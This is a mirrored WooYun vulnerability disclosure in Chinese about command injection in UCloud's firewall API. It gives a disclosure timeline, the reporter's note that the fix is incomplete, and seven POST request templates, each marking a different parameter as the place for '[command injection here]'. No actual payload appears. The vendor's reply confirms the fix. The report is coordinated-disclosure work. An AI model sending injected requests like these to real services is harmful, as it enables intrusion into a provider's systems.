乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-09: 细节已通知厂商并且等待厂商处理中 2014-12-13: 厂商已经确认,细节仅向厂商公开 2014-12-23: 细节向核心白帽子及相关领域专家公开 2015-01-02: 细节向普通白帽子公开 2015-01-12: 细节向实习白帽子公开 2015-01-23: 细节向公众公开
有意思的老问题
看到说修复了,所以复查了一下。
针对同一个请求包中,还有相同问题,其他的估计更不用说了,危害确实非常大,您觉得呢?通过我对业务逻辑的猜测,我猜测该目标服务器可能是........,如果真的是,那么这次给个高rank把?
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=[command injection here]&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=[command injection here]&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=[command injection here]&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=[command injection here]&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=[command injection here]&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=a2dsssfasdfas&description=[command injection here]&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
POST /api/ufirewall HTTP/1.1Host: unet.ucloud.cngroup_name=[command injection here]&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json®ion_id=5001&zone_id=1
危害等级:高
漏洞Rank:12
确认时间:2014-12-13 11:14
已修复,谢谢。
暂无